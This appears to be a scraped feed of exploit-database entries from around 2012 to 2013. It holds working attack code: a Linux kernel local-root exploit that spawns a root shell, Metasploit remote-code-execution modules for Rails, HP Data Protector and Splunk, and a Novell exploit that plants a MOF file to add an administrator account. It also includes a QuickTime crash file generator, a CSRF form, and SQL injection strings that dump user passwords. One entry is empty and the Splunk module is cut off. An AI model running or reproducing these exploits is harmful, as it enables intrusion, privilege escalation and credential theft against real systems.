        commit_creds = (_commit_creds) get_symbol("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
        sock_diag_handlers = get_symbol("sock_diag_handlers");
        nl_table = get_symbol("nl_table");
        if (!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table) {
            printf("some symbols are not available!\n");
            exit(1);
        }
        family = (nl_table - sock_diag_handlers) / 4;
        printf("family=%d\n", family);
        req.r.sdiag_family = family;
        if (family > 255) {
            printf("nl_table is too far!\n");
            exit(1);
        }
    }
    else if (strcmp(argv[1], "Ubuntu") == 0) {
        /* addresses hard-coded for the Ubuntu kernel named in the header comment */
        commit_creds = (_commit_creds) 0xc106bc60;
        prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
        req.r.sdiag_family = 81;
    }

    unsigned long mmap_start, mmap_size;
    mmap_start = 0x10000;
    mmap_size = 0x120000;
    printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }
    memset((void*)mmap_start, 0x90, mmap_size);

    char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
    unsigned long *asd = (unsigned long *) &jump[4]; // patch the mov imm32 with kernel_code's address
    *asd = (unsigned long) kernel_code;
    memcpy((void*)mmap_start + mmap_size - sizeof(jump), jump, sizeof(jump));

    if (send(fd, &req, sizeof(req), 0) < 0) {
        printf("bad send\n");
        close(fd);
        return -1;
    }

    printf("uid=%d, euid=%d\n", getuid(), geteuid());
    if (!getuid()) system("/bin/sh");
    return 0;
}

==> Apple QuickTime Player (Windows) Version 7.7.3 Out of Bound Read

http://rss.feedsportal.com/c/32479/f/477548/index.rss
# Title: Apple Quick Time Player (Windows) Version 7.7.3 Out of Bound Read
# Date: 28th January, 2013
# Author: Debasish Mandal (https://twitter.com/debasishm89)
# Blog : http://www.debasish.in/
# Vendor Homepage: http://www.apple.com/
# Software Link: http://www.apple.com/quicktime/download/
# Version: Apple Quick Time version 7.7.3
# Tested on: Windows XP SP2 / Windows 7
'''
[+] Summary:
A memory out of bound read issue exists in Apple Quick Time Player v7.7.3 which can be triggered while trying to open a specially crafted "qtif" image file using Quick Time Player/Quick Time Picture Viewer or Quick Time Browser Plug-in. If successful, a malicious third party could trigger an invalid memory access, leading to a crash of the process.

[+] Affected Module : QuickTime.qts

[+] Crash Point:
Faulting Instruction:
QuickTime!LIST_ComponentDispatch+0x15ffd3:
66a1a4e3 8b0c06          mov     ecx,dword ptr [esi+eax] ds:0023:42531f20=????????

0:000> r
eax=41414198 ebx=58580000 ecx=414141a0 edx=58585858 esi=0111dd88 edi=41414198
eip=66a1a4e3 esp=0012f324 ebp=42424242 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00210293
QuickTime!LIST_ComponentDispatch+0x15ffd3:
66a1a4e3 8b0c06          mov     ecx,dword ptr [esi+eax] ds:0023:42531f20=????????

[+] Buggy Code: (Code from C:\Program Files\QuickTime\QTSystem\QuickTime.qts)
66A1A4E1   77 70            JA SHORT QuickTim.66A1A553
66A1A4E3   8B0C06           MOV ECX,DWORD PTR DS:[ESI+EAX]
66A1A4E6   0FB65406 03      MOVZX EDX,BYTE PTR DS:[ESI+EAX+3]
66A1A4EB   894C24 14        MOV DWORD PTR SS:[ESP+14],ECX
66A1A4EF   8A7424 16        MOV DH,BYTE PTR SS:[ESP+16]
66A1A4F3   8BF9             MOV EDI,ECX
66A1A4F5   C1E7 10          SHL EDI,10
66A1A4F8   81E1 00FF0000    AND ECX,0FF00
66A1A4FE   0BF9             OR EDI,ECX
66A1A500   C1E7 08          SHL EDI,8
66A1A503   0BD7             OR EDX,EDI
66A1A505   8BCA             MOV ECX,EDX
66A1A507   7E 4A            JLE SHORT QuickTim.66A1A553
66A1A509   8D3C01           LEA EDI,DWORD PTR DS:[ECX+EAX]
66A1A50C   3BEF             CMP EBP,EDI
66A1A50E   72 43            JB SHORT QuickTim.66A1A553
66A1A510   3BF8             CMP EDI,EAX
66A1A512   72 3F            JB SHORT QuickTim.66A1A553
66A1A514   8B4C06 04        MOV ECX,DWORD PTR DS:[ESI+EAX+4]
66A1A518   0FB65406 07      MOVZX EDX,BYTE PTR DS:[ESI+EAX+7]
66A1A51D   894C24 14        MOV DWORD PTR SS:[ESP+14],ECX
66A1A521   8A7424 16        MOV DH,BYTE PTR SS:[ESP+16]
66A1A525   8BD9             MOV EBX,ECX
66A1A527   C1E3 10          SHL EBX,10
66A1A52A   81E1 00FF0000    AND ECX,0FF00
66A1A530   0BD9             OR EBX,ECX
66A1A532   8B4C24 18        MOV ECX,DWORD PTR SS:[ESP+18]
66A1A536   C1E3 08          SHL EBX,8
66A1A539   0BD3             OR EDX,EBX
66A1A53B   3BD1             CMP EDX,ECX
66A1A53D   74 04            JE SHORT QuickTim.66A1A543
66A1A53F   85C9             TEST ECX,ECX
66A1A541   75 07            JNZ SHORT QuickTim.66A1A54A
66A1A543   836C24 1C 01     SUB DWORD PTR SS:[ESP+1C],1
66A1A548   74 0B            JE SHORT QuickTim.66A1A555
66A1A54A   8BC7             MOV EAX,EDI
66A1A54C   8D48 08          LEA ECX,DWORD PTR DS:[EAX+8]
66A1A54F   3BCD             CMP ECX,EBP
66A1A551  ^76 90            JBE SHORT QuickTim.66A1A4E3
66A1A553   33C0             XOR EAX,EAX

[+] Proof of Concept :
'''
# /usr/bin/python
buff = ""
buff += "\x00\x00\x48\x79\x69\x64\x61\x74"
buff += "\x5A"*18545                        # Junks
buff += "\x00\x00\x00\x6E\x69\x64\x73\x63"  # nidsc header
buff += "\x42\x42\x42\x42"
buff += "\x5A"*82                           # Junk
buff += "\x41"*3
buff += "\x42"
buff += "\x58\x58\x58\x58"
f = open('buggy.qtif','w')
f.write(buff)
f.close()

==> WordPress SolveMedia 1.1.0 CSRF PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss
<html>
<form method="post" action="http://server/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true">
  <input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/>
  <input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/>
  <input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" />
  <input type="submit" name="submit" value="Enter" />
</form>

==> Ruby on Rails JSON Processor YAML Deserialization Code Execution

http://rss.feedsportal.com/c/32479/f/477548/index.rss
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in the
        JSON request processor of the Ruby on Rails application framework.
        This vulnerability allows an attacker to instantiate a remote object,
        which in turn can be used to execute any ruby code remotely in the
        context of the application. This vulnerability is very similar to
        CVE-2013-0156.

        This module has been tested successfully on RoR 3.0.9, 3.0.19, and
        2.3.15.

        The technique used by this module requires the target to be running a
        fairly recent version of Ruby 1.9 (since 2011 or so). Applications
        using Ruby 1.8 may still be exploitable using the init_with() method,
        but this has not been demonstrated.
      },
      'Author'         =>
        [
          'jjarmoc', # Initial module based on cve-2013-0156, testing help
          'egypt',   # Module
          'lian',    # Identified the RouteSet::NamedRouteCollection vector
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-0333'],
        ],
      'Platform'       => 'ruby',
      'Arch'           => ARCH_RUBY,
      'Privileged'     => false,
      'Targets'        => [ ['Automatic', {} ] ],
      'DisclosureDate' => 'Jan 28 2013',
      'DefaultOptions' => { "PrependFork" => true },
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
      ], self.class)
  end

  #
  # Create the YAML document that will be embedded into the JSON
  #
  def build_yaml_rails2
    code = Rex::Text.encode_base64(payload.encoded)
    yaml =
      "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
      "eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
      ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
      ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
    yaml.gsub(':', '\u003a')
  end

  #
  # Create the YAML document that will be embedded into the JSON
  #
  def build_yaml_rails3
    code = Rex::Text.encode_base64(payload.encoded)
    yaml =
      "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
      "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
      ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
    yaml.gsub(':', '\u003a')
  end

  def build_request(v)
    case v
    when 2; build_yaml_rails2
    when 3; build_yaml_rails3
    end
  end

  #
  # Send the actual request
  #
  def exploit
    # one request per supported Rails major version (build_request handles 2 and 3)
    [2,3].each do |ver|
      print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
      send_request_cgi({
        'uri'     => normalize_uri(target_uri.path),
        'method'  => datastore['HTTP_METHOD'],
        'ctype'   => 'application/json',
        'headers' => { 'X-HTTP-Method-Override' => 'get' },
        'data'    => build_request(ver)
      }, 25)
      handler
    end
  end
end

==> Java 0day 1.7.0_10 RCE PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss

==> Novell File Reporter Agent XML Parsing Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss
# wwww.abysssec.com
# Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day)
# CVE-2012-4959
# @abysssec
# well just one more of our 0day got published after ~2 year
# here is info : https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959
# and here is our exploit

import httplib, md5, sys

# the NFR agent expects MD5("SRS" + body + "SERVER") prepended to each request body
def message_MD5(arg):
    v = "SRS" + arg + "SERVER"
    m = md5.new(v)
    return m.hexdigest()

def genMof(command="net user abysssec 123456 /add"):
    vbs = ""
    vbs += "\"Set objShell = CreateObject(\\\"WScript.Shell\\\")\\n\"\n"
    vbs += "\"objShell.Run \\\"cmd.exe /C "
    vbs += command
    vbs += "\\\"\""
    mof = """
#pragma namespace ("\\\\\\\\.\\\\root\\\\subscription")
#pragma deleteclass("MyASEventConsumer", nofail)
#pragma deleteinstance("__EventFilter.Name=\\\"EF\\\"", nofail)
#pragma deleteinstance("ActiveScriptEventConsumer.Name=\\\"ASEC\\\"", nofail)

class MyASEventConsumer
{
    [key]string Name;
};

instance of ActiveScriptEventConsumer as $CONSUMER
{
    CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
    Name = "ASEC";
    ScriptingEngine = "VBScript";
    ScriptText = SCRIPT;
};

instance of __EventFilter as $FILTER
{
    CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
    Name = "EF";
    Query = "SELECT * FROM __InstanceCreationEvent"
            " WHERE TargetInstance.__class = \\"MyASEventConsumer\\"";
    QueryLanguage = "WQL";
};

instance of __FilterToConsumerBinding as $BINDING
{
    CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0};
    Filter = $FILTER;
    Consumer = $CONSUMER;
};

instance of MyASEventConsumer
{
    Name = "Trigger";
};
""".replace('SCRIPT', vbs)
    return mof

def main(argv=None):
    if argv is None:
        argv = sys.argv
    if len(argv) != 2:
        print "[!] USAGE : mof \"<command]>\""
        return

    msg = "<ROOT><NAME>FSFUI</NAME><UICMD>130</UICMD><TOKEN><FILE>../../../../../../Windows/system32/wbem/mof/command.mof</FILE></TOKEN><![CDATA["
    msg += genMof(argv[1] + "> C:/Windows/System32/info.dat")
    msg += "]]></ROOT>"
    body = message_MD5(msg).upper() + msg
    headers = {"Content-type": "text/xml"}
    conn = httplib.HTTPSConnection("192.168.10.20:3037")
    conn.request("POST", "/SRS/CMD", body, headers)
    response = conn.getresponse()
    print "\n...Command Executed ..."
    print response.status, response.reason
    print response.read()

    msg = "<ROOT><NAME>FSFUI</NAME><UICMD>126</UICMD><TOKEN><FILE>../../../../../../WINDOWS/system32/info.dat</FILE></TOKEN></ROOT>"
    body = message_MD5(msg).upper() + msg
    conn.request("POST", "/SRS/CMD", body, headers)
    response = conn.getresponse()
    conn.request("POST", "/SRS/CMD", body, headers)
    response = conn.getresponse()
    print "\n...Getting result ..."
    print response.status, response.reason
    print response.read()
    conn.close()

if __name__ == "__main__":
    main()

==> MyBB Bank-v3 Plugin SQL Injection

http://rss.feedsportal.com/c/32479/f/477548/index.rss
# Exploit Title: Bank v3 MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [NullSec]
# Software Link: http://mods.mybb.com/download/bank-v3
# Tested on: Windows & Linux.

Vulnerable code :
<?php
$user=$_POST['r_username'];
$pay=intval($_POST['r_pay']);
$query_r=$db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE username='$user'");
$fetch=$db->fetch_array($query_r);
?>
The variable '$mybb->input['id']' remains unsanitized.

Usage :
http://www.site.com/bank.php
/GET transactions=send
/POST r_pay=Red_Hat&r_username=[SQLi]

==> Joomla JooProperty 1.13.0 Multiple Vulnerabilities

http://rss.feedsportal.com/c/32479/f/477548/index.rss
#########################################
I'm D4NB4R member from Inj3ct0r Team
#########################################

#Exploit Title: Joomla com_jooproperty SQL injection && Cross site scripting Vulnerability
Dork: inurl:com_jooproperty
Date: [10-12-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://www.jooproperty.com/
Version: 1.13.0
Date Added: 12 November 2012
License: GPLv2 or later Commercial]
Compatibility: Joomla! 2.5 Series
Information: http://extensions.joomla.org/extensions/vertical-markets/real-estate/22500
Tested on: [Linux(Arch)-Windows(7ultimate)]

Description: JooProperty is a real estate component developed for Joomla 1.7 and 2.5 with complex integrated booking features, price calculation for different seasons and comment and rating functions. The component is based on com-property for Joomla 1.5 of Fabio Ueltzinger and offers the possibility to import the database of com-property V3 and V4 to migrate your realty website to Joomla 2.5. All property relevant information like categories, locations, description, extras/amenities, season, price categories, prices and special fees can be translated.

Vulnerable Parameter Name: product_id
Parameter Type: Querystring
Method: Get
Attack Pattern Sql: -{Valid id}%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R
Attack Pattern Xss: ?layout=modal&option=com_jooproperty&product_id=" onmouseover%3dprompt() bad%3d"&view=booking

Exploit Demo:
SQLi : SQL injection
http://localhost/?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R
xss : Cross site scripting
http://localhost/?layout=modal&option=com_jooproperty&product_id=%22%20onmouseover%3dprompt%28%29%20bad%3d%22&view=booking

Greetz: All Member Inj3ct0r Team * m1nds group (www.m1nds.com) * pilot * aku * navi_terrible * dedalo * ksha * shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz * By Over-X * Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
Daniel Barragan "D4NB4R" 2012

==> MyBB Profile Blogs Plugin 1.2 Multiple Vulnerabilities

http://rss.feedsportal.com/c/32479/f/477548/index.rss
# Exploit Title: MyBB Profile Blog plugin multiple vulnerabilities.
# Google Dork: inurl:member.php intext:"Profile Blogs" for MyBB
# Date: 12.9.2012
# Exploit Author: Zixem
# Vendor Homepage: http://fklar.pl/
# Software Link: http://mods.mybb.com/view/profile-blogs
# Version: 1.2+
# Tested on: Linux.

MyBB Profile Blogs plugin suffers from SQL Injection && Stored XSS. The vulnerabilities exist within profileblogs.php, which is located in the /plugins/ folder.

#################################### SQLi ####################################
Instructions:
1. Create a new post in your profile blog.
2. Edit it.
3. Inject in the edit GET parameter.

Vulnerable part:
<?php
/*Line 253*/ $pid = $mybb->input['edit'];
/*Line 259*/ $db->query("UPDATE `".TABLE_PREFIX."blogposts` SET `subject` = '".$subject."', `message` = '".$message."' WHERE `pid` = '".$pid."'");
?>
How to exploit it:
member.php?action=profile&uid=2&blogpage=1&edit=[VALID_ID]'[SQLi]
PoC: http://i.imgur.com/HY60R.png

+------------------------------------------------------------------------------------+

#################################### Stored-XSS ####################################
The post subject is stored in the database without XSS protection, like this:
<?php
$subject = addslashes($mybb->input['subject']);
$db->query("INSERT INTO `".TABLE_PREFIX."blogposts` VALUES (NULL, '".$uid."', '".$dateline."', '".$subject."', '".$message."', '".$ipaddress."')");
?>
And also comes out without XSS protection:
<?php
/*328*/ while($post = $db->fetch_array($query)) {
/*333*/ $blog .= "<strong style=\"float: left;\">".$post['subject']."</strong><br />";
?>
As a result, we're getting Stored-XSS.
How to exploit that: http://i.imgur.com/OTIRa.png
PoC: http://i.imgur.com/2Hv9J.png

==> HP Data Protector DtbClsLogin Buffer Overflow

http://rss.feedsportal.com/c/32479/f/477548/index.rss

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Data Protector DtbClsLogin Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The
        overflow occurs during the login process, in the DtbClsLogin function provided by
        the dpwindtb.dll component, where Utf8Cpy (a strcpy-like function) is used in an
        insecure way with the username. Successful exploitation leads to code execution
        with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server
        Service) process, which runs as SYSTEM by default.
      },
      'Author'         =>
        [
          'AbdulAziz Hariri', # Vulnerability discovery
          'juan vazquez'      # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2010-3007' ],
          [ 'OSVDB', '67973' ],
          [ 'BID', '43105' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-174/' ],
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535' ]
        ],
      'Payload'        =>
        {
          'Space'       => 712,
          'BadChars'    => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3',
            {
              'Ret'    => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
              'Offset' => 712
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Sep 09 2010'
    ))

    register_options(
      [
        Opt::RPORT(3817),
      ], self.class)
  end

  # The Hello request announces a (random) machine name. A listening Data
  # Protector Express service answers with a blob containing "Dtb: Context".
  # The same request is used by check and exploit, so it is built once here.
  def hello_request(machine_name)
    hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
    hello << "\x3a\x53\xa5\x71\x02\x40\x80\x00" << "\x89\xff\xb5\x00\x9b\xe8\x9a\x00"
    hello << "\x01\x00\x00\x00\xc0\xa8\x01\x86" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
    hello << "\x00\x00\x00\x00"
    hello << machine_name << "\x00"
    hello << "\x5b\x2e\xad\x71\xb0\x02\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
    hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xe8\xc1\x08\x10"
    hello << "\xb0\x02\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x7c\xfa"
    hello
  end

  def check
    connect
    machine_name = rand_text_alpha(15)
    print_status("#{sock.peerinfo} - Sending Hello Request")
    sock.put(hello_request(machine_name))
    hello_response = sock.get
    disconnect

    if hello_response and hello_response =~ /Dtb: Context/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    machine_name = rand_text_alpha(15)
    print_status("#{sock.peerinfo} - Sending Hello Request")
    sock.put(hello_request(machine_name))
    hello_response = sock.get

    if not hello_response or hello_response.empty?
      print_error("#{sock.peerinfo} - The Hello Request hasn't received a response")
      return
    end

    # Username field: payload, padding up to the SEH record, the SEH record
    # itself, then a short backwards jump into the payload.
    bof = payload.encoded
    bof << rand_text(target['Offset'] - bof.length)
    bof << generate_seh_record(target.ret)
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8}").encode_string
    # The padding below is what triggers the exception. Don't be confused by its size:
    # only a few bytes remain until the end of the stack, and the large write guarantees
    # the exception even when dynamic memory is mapped after the stack. That is also why
    # the handler jumps backwards into the payload rather than forwards.
    bof << rand_text(100000)

    header = [0x8451].pack("V")      # packet id
    header << [0x32020202].pack("V") # svc id
    header << [0x00000018].pack("V") # cmd id
    header << [0].pack("V")          # pkt length, calculated after pkt has been built
    header << "\x00\x00\x00\x00"     # ?Unknown?

    pkt_auth = header
    pkt_auth << bof # username
    pkt_auth[12, 4] = [pkt_auth.length].pack("V") # patch in the packet length at offset 12

    print_status("#{sock.peerinfo} - Sending Authentication Request")
    sock.put(pkt_auth)
    disconnect
  end
end
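The DtbClsLogin bug comes down to a strcpy-style copy of the username into a fixed stack buffer, with nothing tying the copy to the length declared in the packet header. The C program below is an added example, not HP or Metasploit code. It models the 20-byte authentication header the module builds (packet id, svc id, cmd id, packet length at offset 12, unknown) followed by a NUL-terminated username, shows the unbounded copy next to a parser that checks the declared length and refuses a username that does not fit, and builds a packet the same way the module does. USER_MAX, the struct and function names, and the sample usernames are assumptions for illustration; the page does not give the real buffer size in dpwindtb.dll.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN   20
#define USER_MAX  64   /* assumed size of the on-stack username buffer */

struct auth_hdr {
    uint32_t pkt_id, svc_id, cmd_id, pkt_len, unknown;
};

static uint32_t rd32le(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse the header and require the declared length to match what arrived. */
int parse_auth_hdr(const unsigned char *pkt, size_t len, struct auth_hdr *h)
{
    if (len < HDR_LEN)
        return -1;
    h->pkt_id  = rd32le(pkt);
    h->svc_id  = rd32le(pkt + 4);
    h->cmd_id  = rd32le(pkt + 8);
    h->pkt_len = rd32le(pkt + 12);
    h->unknown = rd32le(pkt + 16);
    return (h->pkt_len == len) ? 0 : -1;
}

/* The vulnerable shape: the copy is bounded only by the sender's NUL byte.
 * A username longer than USER_MAX-1 bytes overruns the stack buffer. */
int login_unsafe(const unsigned char *pkt, size_t len)
{
    char user[USER_MAX];
    struct auth_hdr h;
    if (parse_auth_hdr(pkt, len, &h) != 0)
        return -1;
    strcpy(user, (const char *)pkt + HDR_LEN);   /* no bound on the source */
    return (int)strlen(user);
}

/* Hardened: never read past len, and reject a username that would not fit. */
int login_safe(const unsigned char *pkt, size_t len, char *user_out, size_t out_len)
{
    struct auth_hdr h;
    const char *user;
    size_t avail, ulen;

    if (parse_auth_hdr(pkt, len, &h) != 0)
        return -1;
    user  = (const char *)pkt + HDR_LEN;
    avail = len - HDR_LEN;
    for (ulen = 0; ulen < avail && user[ulen] != '\0'; ulen++)
        ;                                  /* bounded scan for the terminator */
    if (ulen == avail)
        return -1;                         /* no NUL inside the packet */
    if (ulen >= out_len || ulen >= USER_MAX)
        return -1;                         /* would overflow the fixed buffer */
    memcpy(user_out, user, ulen);
    user_out[ulen] = '\0';
    return (int)ulen;
}

/* Build a packet the way the module does: fixed ids, length patched in last. */
size_t build_auth_pkt(const char *username, unsigned char *out, size_t out_len)
{
    size_t ulen = strlen(username);
    size_t total = HDR_LEN + ulen + 1;
    uint32_t fields[5] = { 0x8451, 0x32020202, 0x18, 0, 0 };
    if (total > out_len)
        return 0;
    fields[3] = (uint32_t)total;
    for (int i = 0; i < 5; i++) {
        out[4 * i]     = (unsigned char)(fields[i] & 0xff);
        out[4 * i + 1] = (unsigned char)((fields[i] >> 8) & 0xff);
        out[4 * i + 2] = (unsigned char)((fields[i] >> 16) & 0xff);
        out[4 * i + 3] = (unsigned char)((fields[i] >> 24) & 0xff);
    }
    memcpy(out + HDR_LEN, username, ulen + 1);
    return total;
}

int main(void)
{
    unsigned char pkt[4096];
    char user[USER_MAX];
    char longname[800];                     /* constructed oversized username */
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    size_t n = build_auth_pkt("admin", pkt, sizeof pkt);
    printf("5-byte username:   login_safe -> %d\n", login_safe(pkt, n, user, sizeof user));
    n = build_auth_pkt(longname, pkt, sizeof pkt);
    printf("799-byte username: login_safe -> %d (rejected)\n", login_safe(pkt, n, user, sizeof user));
    /* login_unsafe(pkt, n) on the long packet would smash the stack; it is shown, not run. */
    return 0;
}
```

The check on `pkt_len` matters on its own: the module fills that field with the true length, so a server that validated it would still be overflowed by the copy. Only the bound on the copy itself closes the hole; the header check just stops truncated or padded packets from being parsed past their end.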

==> Splunk 5.0 Custom App Remote Code Execution PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Splunk 5.0 Custom App Remote Code Execution',
      'Description'    => %q{
          This module exploits a feature of Splunk whereby a custom application can be
        uploaded through the web based interface. Through the 'script' search command a
        user can call commands defined in their custom application, which can include
        arbitrary perl or python code. To abuse this behavior, a valid Splunk user with
        the admin role is required. By default, this module uses the credential
        "admin:changeme", the default Administrator credential for Splunk. Note that
        the Splunk web interface runs as SYSTEM on Windows, or as root on Linux, by
        default. This module has only been tested successfully against Splunk 5.0.
      },
      'Author'         =>
        [
          "@marcwickenden", # discovery and metasploit module
          "sinn3r",         # metasploit module
          "juan vazquez",   # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html' ],
          [ 'URL', 'http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html' ],
          [ 'URL', 'http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script' ]
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Splunk 5.0.1 / Linux',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => [ 'linux', 'unix' ]
            }
          ],
          [ 'Splunk 5.0.1 / Windows',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => 'win'
            }
          ]
        ],
      'DisclosureDate' => 'Sep 27 2012'))

    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
        OptPath.new('SPLUNK_APP_FILE', [ true, 'The "rogue" Splunk application tgz',
          File.join(Msf::Config.install_root, 'data', 'exploits', 'splunk', 'upload_app_exec.tgz') ])
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('ReturnOutput', [ true, 'Display command output', false ]),
        OptBool.new('DisableUpload', [ true, 'Disable the app upload if you have already performed it once', false ]),
        OptBool.new('EnableOverwrite', [ true, 'Overwrites an app of the same name. Needed if you change the app code in the tgz', false ]),
        OptInt.new('CommandOutputDelay', [ true, 'Seconds to wait before requesting command output from Splunk', 5 ])
      ], self.class)
  end

  def exploit
    # process standard options
    @username = datastore['USERNAME']
    @password = datastore['PASSWORD']
    file_name = datastore['SPLUNK_APP_FILE']

    # process advanced options
    return_output = datastore['ReturnOutput']
    disable_upload = datastore['DisableUpload']
    @enable_overwrite = datastore['EnableOverwrite']
    command_output_delay = datastore['CommandOutputDelay']

    # set up some variables for later use
